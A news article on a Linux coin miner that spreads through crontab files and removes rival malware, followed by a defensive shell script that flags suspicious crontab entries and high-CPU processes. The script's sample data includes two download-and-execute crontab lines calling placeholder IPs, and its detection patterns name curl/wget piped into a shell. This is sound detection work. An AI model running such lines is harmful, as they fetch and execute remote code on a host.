Linux systems targeted by a new type of malware

Feb 12, 2019 08:09 GMT  ·  By

Coin miners have become the new norm in the malware world, and new versions are getting more complex, being able to hide their processes more effectively in order to avoid detection.

But security vendor Trend Micro has recently come across a new Linux coin miner whose purpose isn’t only to run without users being aware of it, but to also remove the other malware and miners that are found on a compromised system.

In an analysis of the script, the security company explains that it reuses code from the KORKERDS miner and relies on crontab entries to make sure it is launched again after a reboot.

The script the malware uses to spread downloads a modified version of XMR-Stak, an open-source cryptocurrency miner for CryptoNight-based currencies that can mine on CPUs as well as on NVIDIA and AMD GPUs.

Using all available resources

Trend Micro explains that the malware targets systems through IP cameras and web services exposed on TCP port 8161, over which the attacker pushes a crontab file whose job is to download a shell script.

Once the script runs on a target device, it kills and removes known malware, coin miners, and the services associated with them, so that all available resources go to its own mining. Wiping out the competition keeps the machine's CPU and GPU capacity free for the script's own processes.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit,” Trend Micro explains.

As always, keeping systems up to date, reviewing crontab entries, and tracking resource usage remain the best ways to stay protected against coin miners: they typically consume all available CPU and GPU capacity and cause a noticeable slowdown in device performance.
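The two checks this article points at, crontab persistence and runaway CPU usage, are easy to script. The following is an added example written for this page, not code from the article or from Trend Micro's analysis: one function flags crontab lines that fetch remote content and pipe it into a shell (the pattern a crontab-delivered download-and-execute stage uses), and another flags processes above a CPU threshold in `ps` output. The crontab content, process names and IP addresses are constructed sample data, not indicators from the real incident.

```sh
#!/bin/sh
# Constructed sample crontab content (illustrative, not from the incident):
# a benign renewal job, two download-and-execute jobs, and a benign backup.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://198.51.100.10/x.sh | sh
@reboot wget -q -O- http://203.0.113.7/update.sh | bash
30 1 * * * /usr/local/bin/backup.sh'

# Constructed sample of `ps -eo pid,pcpu,comm` output. Process names
# are made up; "miner64" and "xmr-stak" stand in for a coin miner.
SAMPLE_PS='  PID %CPU COMMAND
    1  0.0 systemd
  812  1.2 sshd
 4471 99.7 miner64
 4490 98.3 xmr-stak
 5002  2.5 bash'

# flag_suspicious_cron: read crontab text on stdin, drop comment lines,
# and print entries that download something with curl/wget and pipe it
# into a shell, or that decode an inline base64 payload. Exit status is
# 0 when at least one line was flagged, 1 otherwise (grep semantics).
flag_suspicious_cron() {
    grep -v '^[[:space:]]*#' \
        | grep -E \
            -e '(curl|wget)[^|]*\|[[:space:]]*(ba|da|k|z)?sh([[:space:]]|$)' \
            -e 'base64[[:space:]]+(-d|--decode)'
}

# flag_cpu_hogs THRESHOLD: read `ps -eo pid,pcpu,comm` output on stdin
# and print "pid comm" for every process whose %CPU is at or above
# THRESHOLD. The header line is skipped because its second field is
# not numeric.
flag_cpu_hogs() {
    awk -v thr="$1" '$2 ~ /^[0-9.]+$/ && $2 + 0 >= thr + 0 { print $1, $3 }'
}

# Demonstration on the constructed samples.
echo "== suspicious crontab entries =="
printf '%s\n' "$SAMPLE_CRON" | flag_suspicious_cron
echo "== processes at or above 80% CPU =="
printf '%s\n' "$SAMPLE_PS" | flag_cpu_hogs 80
```

On a live host, feed the functions real data instead of the samples: `cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* 2>/dev/null | flag_suspicious_cron` (the spool directory is `/var/spool/cron` on Red Hat-style systems) plus `crontab -l` for each user, and `ps -eo pid,pcpu,comm | flag_cpu_hogs 80`. Since the article notes that these miners hide their processes and kill competitors, treat a matching crontab line or an unexplained high-CPU process as a reason to inspect `/proc/PID/exe` and `/proc/PID/cmdline` rather than trusting the process name alone.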